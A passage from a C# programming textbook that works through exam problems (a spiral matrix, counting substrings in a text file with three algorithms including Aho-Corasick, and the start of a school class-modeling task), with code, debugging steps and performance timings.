MatrixSpiral.cs using System;   public class MatrixSpiral {     static void Main()     {         Console.Write(\"N = \");         int n = int.Parse(Console.ReadLine());         int[,] matrix = new int[n, n];           FillMatrix(matrix, n);           PrintMatrix(matrix, n);     }       private static void FillMatrix(int[,] matrix, int n)     {         int positionX = n / 2; // The middle of the matrix         int positionY = n % 2 == 0 ? (n / 2) - 1 : (n / 2);           int direction = 0; // The initial direction is \"down\"         int stepsCount = 1; // Perform 1 step in current direction         int stepPosition = 0; // 0 steps already performed         int stepChange = 0; // Steps count changes after 2 steps           for (int i = 0; i < n * n; i++)         {             // Fill the current cell with the current value             matrix[positionY, positionX] = i;               // Check for direction / step changes             if (stepPosition < stepsCount)             {                 stepPosition++;             }             else             {                 stepPosition = 1;                 if (stepChange == 1)                 {                     stepsCount++;                 }                 stepChange = (stepChange + 1) % 2;                 direction = (direction + 1) % 4;             }               // Move to the next cell in the current direction             switch (direction)             {                 case 0:                     positionY++;                     break;                 case 1:                     positionX--;                     break;                 case 2:                     positionY--;                     break;                 case 3:                     positionX++;                     break;             }         }     }       private static void PrintMatrix(int[,] matrix, int n)     {         for (int i = 0; i < n; i++)         {             for (int j = 0; j < n; j++)             {                 Console.Write(\"{0,3}\", matrix[i, j]);             }             Console.WriteLine();         }     } }\n\nTesting the Solution\n\nAfter we have implemented the solution it is appropriate to test it with enough values of N to ensure it works properly. We start with the sample values 3 and 4 and then we check for 5, 6, 7, 8, 9, … It works well.\n\nIt is important to check the border cases: 0 and 1. They work correctly as well. We do few more tests and we make sure all cases work correctly. We might notice that when N is large (e.g. 50) the output looks ugly, but this cannot be improved much. We can add more spaces between the numbers but the console is limited to 80 characters and the result is still ugly. We will not try to improve this further.\n\nIt is not necessary to test the program for speed (performance test, for example with N=1,000) because with a very big N the output will be extremely large and the task will be pointless.\n\nWe cannot find any non-working cases so we assume the algorithm and its implementation are both correct and the problem is successfully solved.\n\nNow we are ready for the next problem from the exam.\n\nWe are given a text file words.txt, which contains several words, one per each line. Each word consists of Latin letters only. Write a program, which retrieves the number of matches of each of the given words as a substring in the file text.txt. The counting is case insensitive. The result should be written into a text file named result.txt in the following format (the words should appear in the same order as given in the input file words.txt):\n\n --> -->\n\nSample input file words.txt:\n\nSample input file text.txt:\n\n The Telerik Academy for software development engineers is a famous center for free professional training of .NET experts. Telerik Academy offers courses designed to develop practical computer programming skills. Students graduated the Academy are guaranteed to have a job as a software developers in Telerik.\n\nSample result file result.txt:\n\n for --> 2 academy --> 3 student --> 1 Java --> 0 develop --> 3 CAD --> 3\n\nBelow are the locations of the matched words from the above example:\n\n The Telerik Academy for software development engineers is a famous center for free professional training of .NET experts. Telerik Academy offers courses designed to develop practical computer programming skills. Students graduated the Academy are guaranteed to have a job as a software developers in Telerik.\n\nStart Thinking on the Problem\n\nThe emphasis of the given problem seems not so much on the algorithm, but on its technical implementation. In order to write the solution we must be familiar with working with files in C# and with the basic data structures, as well as string processing in .NET Framework.\n\nInventing an Idea for a Solution\n\nWe get a piece of paper, write few examples and we come up with the following idea: we read the words file, scan through the text and check each word from the text for matches with the preliminary given list of words and increase the counter for each matched word.\n\nChecking the Idea\n\nThe above idea for solving the task is trivial but we can still check it by writing down on a piece of paper the sample input (words and text) and the expected result. We just scan through the text word by word in our paper example and when we find a match with some of the preliminary given words (as a substring) we increment the counter for the matched word. The idea works in our example.\n\nNow let’s think of counterexamples. In the same time we might also come with few questions regarding the implementation:\n\n-     How do we scan the text and search for matches? We can scan the text character by character or line by line or we can read the entire text in the memory and then scan it in the memory (by string matching or by a regular expression). All of these approaches might work correctly but the performance could vary, right? We will think about the performance a bit later.\n\n-     How do we extract the words from the text? Maybe we can read the text and split it by all any non-letter characters? Where shall we take these non-letter characters from? Or we can read the text char by char and once we find a non-letter character we will have the next word from the text? The second idea seems faster and will require less memory because we don’t need to read all the text at once. We should think about this, right?\n\n-     How do we match two words? This is a good question. Very good question. Suppose we have a word from the text and we want to match it with the words from the file words.txt. For example, we have “Academy” in the text and we should find whether it matches as substring the “CAD” word from the list of words. This will require searching each word from the list as a substring in each word from the text. Also can we have some word appearing several times inside another? This is possible, right?\n\nFrom all the above questions we can conclude that we don’t need to read the text word by word. We need to match substrings, not words! The title of the problem is misleading. It says “Counting Words in a Text File” but it should be “Counting Substrings in a Text File”.\n\nIt is really good that we found we have to match substrings (instead of words), before we have implemented the code for the above idea, right?\n\nInventing a Better Idea\n\nNow, considering the requirement for substring matching, we come with few new and probably better ideas about solving the problem:\n\n-     Scan the text line by line and for each line from the text and each word check how many times the word appears as substring in the line. The last can be counted with String.IndexOf(…) method in a loop. We already have solved this subproblem in the chapter “Strings and Text Processing” (see the section “Finding All Occurrences of a Substring”).\n\n-     Read the entire text and count the occurrences of each word in it (as a substring). This idea is very similar to the previous idea but it will require much memory to read the entire text. Maybe this will not be efficient. We gain nothing, but potentially we will run “out of memory”.\n\n-     Scan the text char by char and store the read characters in a buffer. After each character read we check if the text in the buffer ends with some of the words from the list. We will not need to search the words in the buffer because we check for each word after each character is read. We could also clear the buffer when we read any non-letter character (because the list of words for matching should contain letters only). Thus the memory consumption will be very low.\n\nThe first and the last idea seem to be good. Which of them to implement? Maybe we could implement both of them and choose the faster one. Having two solutions will also improve the testing because we should get identical results with both of the solutions on all test cases.\n\nChecking the New Ideas\n\nWe have two good ideas and we need to check them for correctness before thinking about implementation. How to check the ideas? We can invent a good test case on a piece of paper and try the ideas on it.\n\nLet’s have the following list of words:\n\n Word S MissingWord DS aa\n\nWe might be interested to find the number of occurrences of the above words in the following text:\n\nThe expected result is as follows:\n\n Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nIn the above example we have many different special cases: whole-word matching, matching as a substring, matching in different casing, matches in the start / end of the text, several matches inside the same word, overlapping matches, etc. This example is a very good representative of the common case for this problem. It is important to have such short but comprehensive test case when solving programming problems. It is important to have it early, when checking the ideas, before any code is written. This avoids mistakes, catches incorrect algorithms and saves time!\n\nChecking the Line by Line Algorithm\n\nNow let’s check the first algorithm: read the two lines of text and check how many times each of the words from the given list occurs in each line ignoring the character casing. At the first line we find as substrings (ignoring the case) “word” 5 times, “s” 3 times, “MissingWord” 0 times, “aa” 0 times and “ds” – 1 time. At the second line we find as substrings (ignoring the case) “word” 4 times, “s” 10 times, “MissingWord” 0 times, “aa” 3 times and “ds” – 1 time. We sum the occurrences and we find that the result is correct.\n\nWe try to find counterexamples, but we can’t. The algorithm may not work with words spanning multiple lines. This is not possible by definition. It may also have issues with the overlapping matches like finding “aa” in “AAaA”. This will be definitely checked after the algorithm is implemented.\n\nChecking the Char by Char Algorithm\n\nLet’s check the other algorithm: scan through the text char by char, holding the characters in a buffer. After each character if the buffer ends with some of the words (ignoring the character casing), the occurrences of the matched word are increased. If a non-letter is occurred, the buffer is cleaned.\n\nWe start from empty buffer and append the first char from the text “W” to the buffer. None of the words match the end of the buffer. We append “o” and the buffer holds “Wo”. No matches. Then we append “r”. The buffer holds “Wor”. Again no matches are found with any of the words. We append the next char “d” and the buffer holds “Word”. We have found a match with the word form a list: “word”. We increase the number of occurrences of the matched word from zero to one. The next char is “?” and we clean the buffer, because it is not a letter. The next char is “ ” (space). We again clean the buffer. The next char is “W”. We append it to the buffer. No matches with any of the words. We continue further and further… After the last character is processed, the algorithm finishes and the results are correct.\n\nWe try to find counterexamples, but we can’t. The algorithm may not work with words spanning multiple lines, but this is not possible by definition.\n\nDecompose the Problem into Subproblems\n\nNow let’s try to divide the problem into subproblems. This should be done separately for the both algorithms we want to try because they differ significantly.\n\nLine by Line Algorithm Decomposed into Subproblems\n\nLet’s decompose the line by line algorithm into subproblems (sub-steps):\n\n1.  Read the input words. We can read the file words.txt by using File.ReadAllLines(…). It reads a text file in a string[] array of lines.\n\n2.  Process the lines of the text one by one to count the occurrences of each word in it. Initially assign zero occurrences for each word. Read the input file text.txt line by line. For each line from the text and for each word check the number of its occurrences (this is a separate subproblem) and increase the counters for each match. The occurrences counting should be case-insensitive.\n\n3.  Count the number of occurrences of certain substring in certain text. This is a separate subproblem. We find the leftmost occurrence of the substring in the text though string.IndexOf(…). If the returned index > -1 (the substring exists), we increase the counter and find the next occurrence of the substring on the right from the last found index. We perform this in a loop until we find -1 as a result which means that there are no more matches. To perform case-insensitive searching we can pass a special parameter StringComparison.OrdinalIgnoreCase to the IndexOf() method.\n\n4.  Print the results. Process all words and for each word print it along with its counter holding its occurrences in the output file result.txt.\n\nChar by Char Algorithm Decomposed into Subproblems\n\nLet’s decompose the char by char algorithm into subproblems (sub-steps):\n\n1.  Read the input words. We can read the file words.txt by using File.ReadAllLines(…). It reads a text file in a string[] array of lines. The original words can be saved and a copy of them in lowercase can be made to simplify the matching with ignoring the character casing.\n\n2.  Process the text char by char. Read the input file text.txt and append the letters into a buffer (StringBuilder). After each letter appended check whether the text in the buffer ends with some of the words in the input list of words (this check is a separate subproblem). If so, increase the number occurrences of the matched word. If a non-letter character is found, clean the buffer. Letters are converted to lowercase before added in the buffer.\n\n3.  Check whether a certain text (StringBuilder) ends by a certain string. In case the string has length n lower than the length of the text, the result is false. Otherwise the n letters of the string should be compared one by one with the last n letters of the text. If a mismatch is found, the result is false. If all checks pass, the result is true.\n\n4.  Print the results. Process all words and for each word print it along with its counter holding its occurrences in the output file result.txt.\n\nIn the line by line algorithm we don’t have any need of special data structures. We can keep the words in an array or list of strings. We can keep the number of occurrences for each word in array of integer values. The text lines we can keep in strings.\n\nIn the char by char algorithm the situation is similar. We don’t need any special data structures. We can keep the words in an array or list of strings. We can keep the number of occurrences for each word in array of integer values. The buffer for the characters we can implement by StringBuilder (because we need to append chars many times).\n\nFollowing the guidelines for problem solving from the chapter “Methodology of Problem Solving” we should think about the efficiency and performance before writing any code.\n\nThe line by line algorithm will process the entire text line by line and for each text line it will search for all of the words. Thus if the text has a total size of t characters and the number of words are w, the algorithm will totally perform w string searches in t characters. Each search for a word in the text will pass through the entire text (at least once, but maybe not always). If we assume that searching for a word in a text is a linear time operation, we will have w scans through the entire text, so the excepted running time in quadratic: O(w*t). If we search in MSDN or in Internet, we will be unable to find any information about how exactly String.IndexOf(…) works internally and whether it runs in linear time or it is slower. This method calls a Win32 API function so it cannot be decompiled. Thus the best way to check its performance is by measuring.\n\nThe char by char algorithm will process the entire text char by char and for each character it will perform a string matching for each of the words. Suppose the text has t characters and the number of the words is w. In the average case the string matching will run in constant time (it will require just one check if the first letter is not matching, two checks if the first letter matches, etc.). In the worst case the string matching will require n comparisons where n is the length of the word being matched. Thus in the average case the expected running time of the algorithm will be quadratic: O(w*t). In the worst case it will be significantly slower.\n\nIt seems like the line by line algorithm is expected to run faster but we are uncertain about how fast is string.IndexOf(…), so this cannot be definitely stated. If we are at an exam, we will probably choose to implement the line by line algorithm. Just for the experiment, let’s implement both of them and compare their performance.\n\nImplementation: Step by Step\n\nIf we directly follow the steps, which we have already identified we can write the code with ease. Of course it is better to implement the algorithms step-by-step, to find and fix the bugs early.\n\nLine by Line Algorithm: Step by Step Implementation\n\nWe can start implementing the line by line algorithm for word counting in a text file from the method that counts how many times a substring appears in a text. It should look like the following:\n\n static int CountOccurrences(  string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nLet’s test it before going further:\n\n Console.WriteLine(     CountOccurrences(\"hello\", \"Hello World Hello\"));\n\nThe result is 0 – wrong! It seems like we have forgotten to ignore the character casing. Let’s fix this. We need to change the name of the method as well and add the StringComparison.OrdinalIgnoreCase option when searching for the given substring:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nLet’s test again with the same example. The program hangs! What happens? We step through the code using the debugger and we find that the variable index takes the first occurrence at position 0 and at the next iteration it takes the same occurrence again at position 0 and the program enters into an endless loop. This is easy to fix. Just start searching from position index+1 (the next position on the right), not from index:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = 0;     while (true)     {         index = text.IndexOf(substring, index + 1,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nWe run the fixed code with the same test. Now the result is incorrect (1 occurrence instead of 2). We again trace the program with the debugger and we find that the first match is at position 12. Immediately we find out why this happens: initially we start from position 1 (index + 1 when index is 0) and we skip the start of the text (position 0).\n\nThis is easy to fix:\n\n static int CountOccurrencesIgnoreCase(     string substring, string text) {     int count = 0;     int index = -1;     while (true)     {         index = text.IndexOf(substring, index + 1,             StringComparison.OrdinalIgnoreCase);         if (index == -1)         {             // No more matches             break;         }         count++;     }     return count; }\n\nWe test again with the same example and finally the result is correct. We take another, more complex test:\n\nThe result is again correct (9 matches). We test with missing word and the result is again correct (0 matches). This is enough. We assume the method works correctly. Now let’s continue with the next step: read the words.\n\nThere is no need to test this code. It is too simple to have bugs. We will test it when we test the entire solution. Let’s not write the main logic of the program which reads the text line by line and counts the occurrences of each of the input words in each of the lines:\n\n int[] occurrences = new int[words.Length]; using (StreamReader text = File.OpenText(\"text.txt\")) {     string line;     while ((line = text.ReadLine()) != null)     {         for (int i = 0; i < words.Length; i++)         {             string word = words[i];             int wordOccurrences =                 CountOccurrencesIgnoreCase(word, line);             occurrences[i] += wordOccurrences;         }     } }\n\nThis code definitely should be tested but it will be easier to write the code which prints the results to simplify testing. Let’s do this:\n\n using (StreamWriter result = File.CreateText(\"result.txt\")) {     for (int i = 0; i < words.Length; i++)     {         result.WriteLine(\"{0} --> {1}\", words[i], occurrences[i]);     } }\n\nThe complete implementation of the line by line string occurrences counting algorithms looks as follows:\n\n CountSubstringsLineByLine.cs using System; using System.IO;   public class CountSubstringsLineByLine {     static void Main()     {         // Read the input list of words         string[] words = File.ReadAllLines(\"words.txt\");           // Process the file line by line         int[] occurrences = new int[words.Length];         using (StreamReader text = File.OpenText(\"text.txt\"))         {             string line;             while ((line = text.ReadLine()) != null)             {                 for (int i = 0; i < words.Length; i++)                 {                     string word = words[i];                     int wordOccurrences =                         CountOccurrencesIgnoreCase(word, line);                     occurrences[i] += wordOccurrences;                 }             }         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             for (int i = 0; i < words.Length; i++)             {                 result.WriteLine(\"{0} --> {1}\",                     words[i], occurrences[i]);             }         }     }       static int CountOccurrencesIgnoreCase(         string substring, string text)     {         int count = 0;         int index = -1;         while (true)         {             index = text.IndexOf(substring, index + 1,                 StringComparison.OrdinalIgnoreCase);             if (index == -1)             {                 // No more matches                 break;             }             count++;         }         return count;     } }\n\nTesting the Line by Line Algorithm\n\nNow let’s test the entire code of the program. We try our test and it works as expected!\n\n text.txt Word? We have few words: first word, second word, third word. Some passwords: PASSWORD123, @PaSsWoRd!456, AAaA, !PASSWORD words.txt Word S MissingWord DS aa result.txt Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nWe also try the sample test from the problem description and it also works correctly. We try few other tests and all they work correctly. We try also few border cases like empty text and empty list of words. All these cases are handled correctly. It seems like our line by line word counting algorithm and its implementation correctly solve the problem.\n\nWe need to conduct only a performance test but let’s first implement the other algorithm to be able to compare which is faster.\n\nChar by Char Algorithm: Step by Step Implementation\n\nLet’s now implement the char by char string occurrences counting algorithm. We will need a StringBuilder to hold the characters we read and a method to check for a match at the end of the StringBuilder. Let’s define this method first. For more flexibility it can be implemented as extension method to the StringBuilder class (recall how extension methods work from the chapter “Lambda Expressions and LINQ”):\n\n static bool EndsWith(this StringBuilder buffer, string str) {     for (int bufIndex = buffer.Length-str.Length, strIndex = 0;         strIndex < str.Length;         bufIndex++, strIndex++)     {         if (buffer[bufIndex] != str[strIndex])         {             return false;         }     }     return true; }\n\nLet’s test the method with a sample text and its ending:\n\n Console.WriteLine(     new StringBuilder(\"say hello\").EndsWith(\"hello\"));\n\nThis test produces a correct result: True. Let’s test the negative case:\n\n Console.WriteLine(new StringBuilder(\"abc\").EndsWith(\"xx\"));\n\nThis test produces a correct result: False. Let’s test what will happen if the ending is longer than the test:\n\n Console.WriteLine(new StringBuilder(\"a\").EndsWith(\"abcdef\"));\n\nWe get IndexOutOfRangeException. We found a bug! It is easy to fix – we can return false if the ending string is longer than the text where it should be found:\n\n static bool EndsWith(this StringBuilder buffer, string str) {     if (buffer.Length < str.Length)     {         return false;     }     for (int bufIndex = buffer.Length - str.Length, strIndex = 0;         strIndex < str.Length;         bufIndex++, strIndex++)     {         if (buffer[bufIndex] != str[strIndex])         {             return false;         }     }     return true; }\n\nWe run all the tests again and all of them pass. We assume the above method is correctly implemented.\n\nNow let’s continue with the step-by-step implementation. Let’s implement the reading of the words:\n\nThis is the same code from the line by line algorithm and it should work.\n\nLet’s now implement the main program logic which reads the text char by char in a buffer of characters and after each letter checks all input words for matches at the ending of the buffer:\n\n int[] occurrences = new int[words.Length]; using (StreamReader text = File.OpenText(\"text.txt\")) {     StringBuilder buffer = new StringBuilder();     int nextChar;     while ((nextChar = text.Read()) != -1)     {         char ch = (char)nextChar;         if (char.IsLetter(ch))         {             // A letter is found --> check all words for matches             buffer.Append(ch);             for (int i = 0; i < words.Length; i++)             {                 string word = words[i];                 if (buffer.EndsWith(word))                 {                     occurrences[i]++;                 }             }         }         else         {             // A non-letter character is found --> clean the buffer             buffer.Clear();         }     } }\n\nTo test the code we will need few lines of code to print the output:\n\n using (StreamWriter result = File.CreateText(\"result.txt\")) {     for (int i = 0; i < words.Length; i++)     {         result.WriteLine(\"{0} --> {1}\",             words[i], occurrences[i]);     } }\n\nNow the program is completed and we should test it.\n\nTesting the Char by Char Algorithm\n\nLet’s test the entire code of the program. We try our test and it fails. The produced result is incorrect:\n\n Word --> 1 S --> 6 MissingWord --> 0 DS --> 0 aa --> 0\n\nWhat’s wrong? Maybe the character casing? Do we compare the characters in case-insensitive fashion? No. We found the problem.\n\nHow to fix the character casing? Maybe we need to fix the EndsWith(…) method. We search in MSDN and in Internet and we cannot find a method to compare case-insensitively characters. We can do something like this:\n\n if (char.ToLower(ch1) != char.ToLower(ch2)) …\n\nThe above code will work but it will convert the characters to lowercase many times, at each character comparison. This may be slow so it is better to lowercase the words and the text preliminary before comparing. If we lowercase the words, they will be printed in lowercase at the output and this will be incorrect. So we need to remember the original words and to make a copy of them in lowercase. Let’s try it. We can use the built-in extension methods from System.Linq to perform the lowercase conversion:\n\n string[] wordsOriginal = File.ReadAllLines(\"words.txt\"); string[] wordsLowercase =     wordsOriginal.Select(w => w.ToLower()).ToArray();\n\nWe need to apply few other fixes and finally we get the following full source code of the char by char algorithm for counting the occurrences of a list of substrings in given text:\n\n CountSubstringsCharByChar.cs using System.IO; using System.Linq; using System.Text;   public static class CountSubstringsCharByChar {     static void Main()     {         // Read the input list of words         string[] wordsOriginal = File.ReadAllLines(\"words.txt\");         string[] wordsLowercase =             wordsOriginal.Select(w => w.ToLower()).ToArray();           // Process the file char by char         int[] occurrences = new int[wordsLowercase.Length];         StringBuilder buffer = new StringBuilder();         using (StreamReader text = File.OpenText(\"text.txt\"))         {             int nextChar;             while ((nextChar = text.Read()) != -1)             {                 char ch = (char)nextChar;                 if (char.IsLetter(ch))                 {                     // A letter is found --> check all words for matches                     ch = char.ToLower(ch);                     buffer.Append(ch);                     for (int i = 0; i < wordsLowercase.Length; i++)                     {                       string word = wordsLowercase[i];                       if (buffer.EndsWith(word))                       {                           occurrences[i]++;                       }                     }                 }                 else                 {                     // A non-letter is found --> clean the buffer                     buffer.Clear();                 }             }         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             for (int i = 0; i < wordsOriginal.Length; i++)             {                 result.WriteLine(\"{0} --> {1}\",                     wordsOriginal[i], occurrences[i]);             }         }     }       static bool EndsWith(this StringBuilder buffer, string str)     {         if (buffer.Length < str.Length)         {             return false;         }         for (int bufIndex = buffer.Length-str.Length, strIndex = 0;             strIndex < str.Length;             bufIndex++, strIndex++)         {             if (buffer[bufIndex] != str[strIndex])             {                 return false;             }         }         return true;     } }\n\nWe need to test again with our example. Now the program works. The result is correct:\n\n Word --> 9 S --> 13 MissingWord --> 0 DS --> 2 aa --> 3\n\nWe test with all other tests we have (the test from the problem statement, the border cases, etc.) and all of them pass correctly.\n\nTesting for Performance\n\nNow it is time to test for performance both our solutions. We need a big test. We can do it with copy-paste. It is easy to copy-paste the text from our text example 10,000 times and its words 100 times. The repeating words might cause inaccuracies in performance measuring so we manually replace the last 26 words with the letters from “a” to “z”. We also play a bit with the rectangular selection in Visual Studio ([Alt] + mouse selection) and we insert the alphabet as a vertical column in few other places. All this will result in 20,000 lines of text (1.2 MB) and 500 words (3 KB).\n\nTo measure the execution time we add two lines of code – before the first line of the Main() method and after the last line of the Main() method:\n\n static void Main() {     DateTime startTime = DateTime.Now;     // The original code goes here     Console.WriteLine(DateTime.Now - startTime); }\n\nNow we execute first the line by line algorithm and it seems not very fast. On average computer from 2008 it prints the following result:\n\n 00:01:33.6393559\n\nAfter that we execute the char by char algorithm. It produces the following output:\n\n 00:00:18.1080357\n\nUnbelievable! Our char by char processing algorithm is more than 5 times faster than the line by line processing algorithm! But … it still is slow! 18 seconds for 1 MB file is not fast. How about processing 500 MB input and search for 10,000 words?\n\nInvent a Better Idea (Again)\n\nIf we are at exam, we could decide whether to take the risk to submit the char by char solution or spend more time to think of faster algorithm. This depends on how much time we have to the end of the exam and how much problems we have already solved, how hard are the unsolved problems, etc. Suppose we have enough time and we want to think more.\n\nWhat makes our solution slow? If we have 500 words, we check for each of them at each character. We do 500 * length(text) string comparisons. The text is scanned only once (char by char). This cannot be improved, right? If we do not scan the entire text, we will be unable to find all occurrences. So if we want to improve the performance, we should look how to check the words faster after each character is read, right? For 500 words we perform 500 checks after each character is read. This is slow! Can’t we do it faster?\n\nIn fact we perform a kind of searching for a matching word in a list of words? From the data structures we know that this takes linear time. Also, from the data structures we know that the fastest data structure for searching is the hash-table. OK, can’t we use a hash table? Instead of searching the words by trying each of them one by one, can’t we directly find the word we need through a hast-table lookup?\n\nWe take a sheet of paper and the pencil and we start making sketches and thinking. Suppose we have the text “passwords” and the word “s”. We can check the word that we obtain when we append the letters one after another:\n\nIn this case we will not match the word “s”, right. In fact, when we find a word in the text, we should check all its substrings in the hash table. For example if the text is “password”, all its substrings are:\n\n p, pa, a, pas, as, s, pass, ass, ss, s, passw, assw, ssw, sw, w, passwo, asswo, sswo, swo, wo, o, passwor, asswor, sswor, swor, wor, or, r, password, assword, ssword, sword, word, ord, rd, d, passwords, asswords, sswords, swords, words, ords, rds, ds, s\n\nThere are 45 substrings of the word “password”. In a word of n characters we have n*(n+1)/2 substrings. This will work well with short words (e.g. 3-4 characters) and will be slow for the long words (e.g. 15-20 characters).\n\nWe get into another idea? This multi-pattern matching problem should have a standard solution. Why don’t we search for it in Internet? We try to search for “multi-pattern matching algorithm” in Google and after exploring the first few results we learn about the Aho-Corasick string matching algorithm. Once we know the algorithm name we search for “Aho Corasick C#” and we find a nice C# implementation: https://github.com/tupunco/Tup.AhoCorasick. The theory says that after we have a new idea, we should check it for correctness. The best way to check this idea is by putting the code we found in action. In fact we do not implement the algorithm. We just try to adopt it to solve the problem we have.\n\nCounting Substrings with the Aho-Corasick Algorithm\n\nFrom the open-source implementation of the Aho-Corasick multi-pattern string matching algorithm mentioned above we can take the class AhoCorasickSearch and put it in action. We write a new solution of the substring counting problem based on what we have learned from the previous solutions. We find all matches of all words by the SearchAll(…) method of the AhoCorasickSearch class. Then we use a hash-table to count the number of occurrences for each of the words. To ensure we ignore the character casing we convert the text and the words into lowercase. This is the code:\n\n CountSubstringsAhoCorasick.cs using System; using System.Collections.Generic; using System.Linq; using System.IO;   class CountSubstringsAhoCorasick {     static void Main()     {         DateTime startTime = DateTime.Now;           // Read the input list of words         string[] wordsOriginal = File.ReadAllLines(\"words.txt\");         string[] wordsLowercase =             wordsOriginal.Select(w => w.ToLower()).ToArray();           // Read the text         string text = File.ReadAllText(\"text.txt\").ToLower();           // Find all word matches and count them         var search = new AhoCorasickSearch();         var matches = search.SearchAll(text, wordsLowercase);         Dictionary occurrences =             new Dictionary();         foreach (string word in wordsLowercase)         {             occurrences[word] = 0;         }         foreach (var match in matches)         {             string word = match.Match;             occurrences[word]++;         }           // Print the result         using (StreamWriter result = File.CreateText(\"result.txt\"))         {             foreach (string word in wordsOriginal)             {                 result.WriteLine(\"{0} --> {1}\", word,                     occurrences[word.ToLower()]);             }         }           Console.WriteLine(DateTime.Now - startTime);     } }\n\nWe test the above code with all tests we already have and it seems to work correctly. We try the performance test and this time we can be amazed by its speed:\n\n 00:00:00.6540374\n\nIt runs really fast. This is the solution we needed and if we are allowed to use Internet at the exam, the best way to start when we have a standard well-known problem is to look for a well-known solution.\n\nProblem 3: School\n\nStudents, which are studying in a school, are separated into groups. Each of the groups has a teacher. The following information is kept for the students: first name and last name. The following information is kept for the groups: name, a list of students and teacher. The following information is kept for the teachers: first name, last name and a list of groups he is teaching. Each teacher can teach more than one group. The following information is kept for the school: name, list of the teachers, list of the groups and list of the students. Your task is to:\n\n1.  Design a set of classes and relationships between them to model the school, its students, teachers and groups.\n\n2.  Implement functionality for add / edit / delete teachers, students, groups and their properties.\n\n3.  Implement functionality for printing in human-readable form the school, the teachers, the students, the groups and their properties.\n\n4.  Write a sample test program, which demonstrates the work of the implemented classes and methods.\n\nExample of school with teachers, students and groups:\n\n School \"Freedom\". Teachers: Tom Johnson, Elizabeth Hall. Group \"English\": David Russell, Nicholas Grant, Emma Fletcher, John Brown, Emily Cooper, teacher Elizabeth Hall. Group \"French\": Kevin Simmons, Ian Hayes, teacher Elizabeth Hall. Group \"Informatics\": Jessica Carter, Andrew Cooper, Ashley Moore, Olivia Adams, Jonathan Smith, teacher Tom Johnson.\n\nStart Thinking on the Problem\n\nThis is a good example of an exam assignment the purpose of which is to test your abilities to use object-oriented programming (OOP) for modeling problems from the real life, design classes and relationships between them as well as working with collections.\n\nAll we need to solve this problem is to use our object-oriented modeling skills that we have gained from chapter “Object-Oriented Programming Principles”, especially from the section “Object-Oriented Modeling (OOM)”.\n\nInventing an Idea for Solution\n\nIn this task there is nothing complex to invent. It is not algorithmic and there is not anything to be thought up. We must define a class for each of the described in the problem description objects (students, teachers, school students, groups, school, etc.) and after that we should define in each class properties to describe its characteristics and methods to implements the actions the class can do, e.g. printing in human-readable form. That’s all.\n\nFollowing the directions from the section “Object-Oriented Modeling (OOM)” we could identify the nouns in the problem description. Some of them should be modeled as classes; some of them as properties; and some of them may not be important and could be disregarded.\n\nReading the text from the problem description and analyzing the nouns, we could come to the idea to model the school through defining few interrelated classes: Student, Group, Teacher and School. For testing the classes we could create a class SchoolTest, which will create few objects of each class and will demonstrate their work in action.\n\nChecking the Idea\n\nWe will not check the idea because there is nothing to be proven or checked. We need to write few classes to model a real-world situation: a school with students, teachers and groups.\n\nDividing the Problem into Subproblems\n\nThe implementation of each of the classes we already identified can be considered a subproblem of the given school modeling problem. Thus we have the following subproblems:\n\n-     Class for the students – Student. Students will have first name, last name and a method for printing in human-readable form – ToString().\n\n-     Class for the groups – Group. Groups will have a name, a teacher and a list of students. It will also have а method for printing in human-readable form.\n\n-     Class for the teachers – Teacher. Teachers will have first name, last name and a list of groups, as well as а method for printing in human-readable form.\n\n-     Class for the school – School. It will have a name and will hold all students, all teachers and all groups.\n\n-     Class for testing the other classes – SchoolTest. It will create a school with a few students, a few groups holding subsets of the students and a few teachers. It will assign one teacher per group and a few groups per teacher accordingly. Finally the class will print the school and all its teachers, groups and students.\n\nThe data structures, needed for this problem, are of two main groups: classes and relationships between the classes. Classes will be classes. We have nothing to decide here. The interesting part is how to describe the relationships between the classes, e.g. when a group has a collection of students.\n\nTo describe a relationship (link) between two classes we can use an array. With an array we have access to its elements by index, but once it is created we will not be able to add or delete items (arrays have a fixed size). This makes it uncomfortable for our problem, because we don’t know how many students we will have in the school and more students can be added or removed after the school is once created.\n\nList<T> seems more comfortable. It has the advantages of an array and also has a variable length – it is easy to add or delete elements. List<T> can hold lists of students (inside the school and inside a group), lists of teachers (inside a school) and lists of groups (inside a school and inside a teacher).\n\nSo far it seems List<T> is the most appropriate for holding aggregations of objects inside another object. To be convinced we will analyze a few more data structures. For example hash-table – it is not appropriate in this case, because the school, teachers, students and groups are not of a key-value type. A hash-table would be appropriate if we need to search a student by its unique student ID, but this is not the case. Structures like stack and queue are inappropriate – we do not have LIFO or FIFO behavior.\n\nThe structure “set” and its implementation HashSet<T> may be used when we need to have uniqueness for given key. It would be good sometimes to use this structure to avoid duplicates. We must recall that HashSet<T> requires the methods GetHashCode() and Equals(…) to be correctly defined by the T type. Shall we use sets and where? To answer this question we need to recall the problem description. What is says? We need to design a set of classes to model the school, its students, teachers and groups and functionality for add / edit / delete teachers, students, groups and their properties. The easiest way to implement it is to hold a list of students in the school, a list of groups for each teacher, etc. Lists are easier to implement. Sets give uniqueness, but require Equals() and GetHashCode(). Sets need more effort to be used. So we may use lists to simplify our work.\n\nAccording to the requirements the school should allow add / edit / delete of students, teachers and groups. The easiest way to implement this is to expose the lists of students, teachers and groups as public properties. List<T> already have methods for add and delete of its elements and its elements are accessible by index and editable. It does the job.\n\nFinally we choose to use List<T> for all aggregations in our classes and we will expose all the class members as properties with read and write access. We do not have a good reason to restrict the access to the members or implement immutable behavior.\n\nImplementation: Step by Step\n\nIt’s appropriate to start the implementation with the class Student because it does not depend on any of the other classes.\n\nStep 1: Class Student\n\nIn the problem definition we have only two fields representing the first name and the last name of a student. We may add a property Name, which returns a string with the full name of the student and a ToString() implementation to print the student in human-readable form. We might define the class Student as follows:\n\n Student.cs public class Student {     